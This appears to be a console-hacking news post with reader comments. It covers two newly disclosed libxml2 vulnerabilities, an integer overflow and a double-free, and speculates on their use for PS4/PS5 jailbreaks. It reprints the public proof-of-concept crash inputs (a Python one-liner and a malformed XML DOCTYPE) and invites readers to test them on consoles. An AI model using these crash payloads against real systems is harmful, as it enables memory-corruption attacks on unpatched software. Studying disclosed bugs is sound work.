Freshly revealed vulnerabilities could impact PS4 and PS5
Google project Zero have reported new vulnerabilities in libxml2, an open source library which is used on the PS4 (and possibly on PS5).
Libxml2 vulnerabilities could impact PS4, PS5
Google Project Zero are the infosec team at google who study zero-day vulnerabilities in mainstream software and hardware. Earlier today they reported two potentially exploitable vulnerabilities in libxml2, an open source library used to parse XML Files. Incidentally, one of the reports is from Ned “nedwill” Williamson of 3DS Soundhax and iOS 12.2 exploits fame, now an infosec engineer at google.
Libxml2 is listed as one of the PS4’s Open Source dependencies. We assume it is used on the PS4 to parse some manifest files, such as the update manifests the console fetches regularly to check for firmware updates. Although libxml2 is not explicitly named for the PS5 dependencies, it is is used in Webkit, a critical part of both PS4 and PS5’s Web Browsers.
It’s not entirely clear if those dependencies are actually used in the PS4 and PS5 browsers, however references to libxml2 exist in the PS5 Webkit source code, for example in the Webcore/xml directory.
As such, vulnerabilities in that library could be leveraged for exploits on the PS4 and PS5, assuming it is indeed used on the consoles. Tests are required (see below), which hopefully some good souls will be running in the days or weeks to come, to confirm if anything can be done with those bugs.
Libxml2 Vulnerabilities that could be exploitable on PlayStation consoles
Earlier this year, Google Project zero have reported critical vulnerabilities in libxm2. A few hours ago, these bugs have been publicly disclosed. Specifically, the bugs are as follows:
[CVE-2022-40303] – Integer overflow in xmlParseNameComplex
libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters).
- PoC:
$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml
- Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=2336
- Bug fix: https://github.com/GNOME/libxml2/commit/ffaec75809a315457891a0e54f8828bc6e056067
[CVE-2022-40304] Double-free in libxml2 when parsing default attributes
- PoC:
```xml <!DOCTYPE A SYSTEM "" [ <!ENTITY ENT_A SYSTEM "" NDATA A> <!ENTITY ENT_B "&ENT_A;&ENT_B;"> <!ATTLIST A C CDATA ""> <!ATTLIST A D CDATA ""> <!ATTLIST A E CDATA ""> <!ATTLIST A F CDATA ""> <!ATTLIST A G CDATA "&ENT_B;"> ]> ```
- Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=2335
- Bug fix: https://github.com/GNOME/libxml2/commit/644a89e080bced793295f61f18aac8cfad6bece2
Other libxml2 vulnerabilities
Looking in recent history of the libxml2 history, a few other commits to the codebase look interesting from an exploitation perspective (those issues were not reported as part the recent google project zero report):
All of these 4 vulnerabilities are fresh, fixed in Q3 2022.
Are the PS5 and PS4 really vulnerable to these bugs?
At this moment, these are just promising leads that just came from the infosec world, for a specific open source library, that might, or might not be used on PS4 and PS5. The first step would be to verify that. Someone needs to set up test environments that could trigger the potential crashes. This requires either using the integrated Web Browser on the consoles to load the PoC files, or finding more clever ways to load these files (e.g. creating a fake update xml manifest and downloading it). When the PoC files are not provided, they also need to be created.
It is unclear if the PS4 and PS5 actually use libxml2 in a way that could trigger these bugs (in the case of the PS5, it’s actually unclear if it uses libxml2 at all), so that first needs to be verified with the tests described above. If that gets confirmed, whether those bugs could actually become exploit then becomes a huge question. Parsing bugs in XML, even if they are confirmed, might not be leveraged as “easily” as typical Webkit vulnerabilities.
If you happen to have the time and skills to run those tests, by all means give it a try, and post your results 🙂
luckly I dont have ps5 yet
WAITING FOR SOMEONE TEST THIS… RELEASE EXPLOIT FOR PS4 9.03, One year of Waiting
Damn I have a 500 Million LE PS4 ( 4 sleepless refresh nights) MSRP, then 1x PS5 from PS Direct (Horizon Bundle) MSRP, and now I added the STILL sealed God of War new PS5 Disc Edition in my IKEA showcase! (alongside my dreamcast + ps2 + BC PS3 + etc..
I’m a collector, I understand your pain, I bought a ps4 og on eBay on 5.00, for a reasonable price, updated to 5.05 and it WAS A DREAM!
Gifted it to someone I love and now the PS4 500 Million is in the showcase locked (had it on 7.02 to 9.00) I was so lucky, I waited and waited did not care for the online
A stupid friend made me update my PS4 to play that *** Genshin Impact, played once, never touched it again and lost the possibility to jailbreak, damn it anime rpg…. <='(
Oh man…. My wife did the same. I din’t notice at that time…. Sad story
JUST WANT TO SAY TO ANYBODY THINKING ABOUT UPDATING THEIR PS4 SYSTEM SOFTWARE IF YOU WANT TO HAVE ANY CHANCE OF A JAILBREAK AND ANY CHANCE OF ANY AWESOME POSSIBILITIES DO NOT UPDATE AND OR ANY CIRCUMSTANCES YOU WILL BE SHOOTING YOURSELF IN THE FOOT GUARANTEED RIGHT BEFORE THE 9.00 JAILBREAK CAME OUT I HAD UPDATED MY PS4 SYSTEM SOFTWARE TWO DAYS LATER THE PS4 9.00 JAILBREAK WAS RELEASED
I AM CURRENTLY NOW ON SYSTEM SOFTWARE 10.01 AND i WILL NOT UPDATE EVER AGAIN IT’S GOING TO BE A LONG TIME BEFORE i SEE A JAILBREAK SO TAKE MY WORD FOR IT DO NOT UPDATE UNDER ANY CIRCUMSTANCES NOT WORTH IT
THE DOWNSIDE OF NOT UPDATING YOU WILL NOT BE ABLE TO PLAY ONLINE YOU WILL NOT BE ABLE TO RE-ACTIVATE YOUR PS4 AFTER RESTORING YOU WILL NOT BE ABLE TO USE THIS ONLINE SAVE DATA STORAGE FROM PLAYSTATION NETWORK
MY ADVICE TO EVERYBODY DO NOT PAY FOR PLAYsTATION NETWORK IF YOU WANT TO JAILBREAK BECAUSE CHANCES ARE YOU WILL HAVE TO STAY ON THE MOST UP-TO-DATE FIRMWARE TO CONTINUE TO USE IT THE MORE YOU UPDATE THE FURTHER AND FURTHER YOU GET FROM A JAILBREAK
Simon c’est l’osti de meilleur hacker QUEBECOIS les amis !
Grosse Salutation mon chum !